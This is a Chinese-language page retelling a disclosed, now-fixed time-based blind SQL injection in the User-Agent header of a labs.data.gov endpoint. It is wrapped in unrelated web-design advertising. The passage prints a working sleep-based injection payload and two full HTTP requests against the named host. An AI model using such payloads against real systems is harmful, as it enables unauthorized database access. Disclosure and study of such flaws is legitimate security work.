如何分析HTTP头注入中的User-Agent注入

如何分析 HTTP头注入中的User-Agent注入,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

成都创新互联公司从2013年成立,是专业互联网技术服务公司,拥有项目成都网站制作、网站建设、外贸网站建设网站策划,项目实施与项目整合能力。我们以让每一个梦想脱颖而出为使命,1280元若羌做网站,已为上家服务,为若羌各地企业和个人服务,联系电话:18982081108


漏洞信息
发现者:harisec

漏洞种类:SQL注入

危害等级:严重

漏洞状态:已修复


前言
Harisec在以下网站中发现一个SQL注入漏洞,注入的位置在User-Agent。
https://labs.data.gov/dashboard/datagov/csv_to_json

漏洞再现
Harisec使用了盲注的方式来确认该漏洞

例如:将User-Agent的值设置为

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'

将导致服务器在25秒后响应

这里,我们看一下具体的数据包内容

GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*

如何分析 HTTP头注入中的User-Agent注入

服务器在25秒后响应,与User-Agent的值相同

将User-Agent的值改一下,改成9秒后响应

GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(3*3),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*

如何分析 HTTP头注入中的User-Agent注入


漏洞影响

该漏洞可以使攻击者注入恶意的SQL语句。

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注创新互联行业资讯频道,感谢您对创新互联的支持。


分享名称:如何分析HTTP头注入中的User-Agent注入
文章链接:http://bzwzjz.com/article/jppsjg.html

其他资讯

Copyright © 2007-2020 广东宝晨空调科技有限公司 All Rights Reserved 粤ICP备2022107769号
友情链接: 成都响应式网站建设公司 成都网站制作 营销型网站建设 成都网站设计 外贸网站设计方案 高端网站设计推广 公司网站建设 成都网站制作公司 网站建设公司 手机网站制作 网站设计制作 成都网站设计 做网站设计 广安网站设计 成都商城网站制作 定制网站建设多少钱 成都网站建设公司 外贸营销网站建设 成都网站设计 网站制作 网站建设费用 成都企业网站制作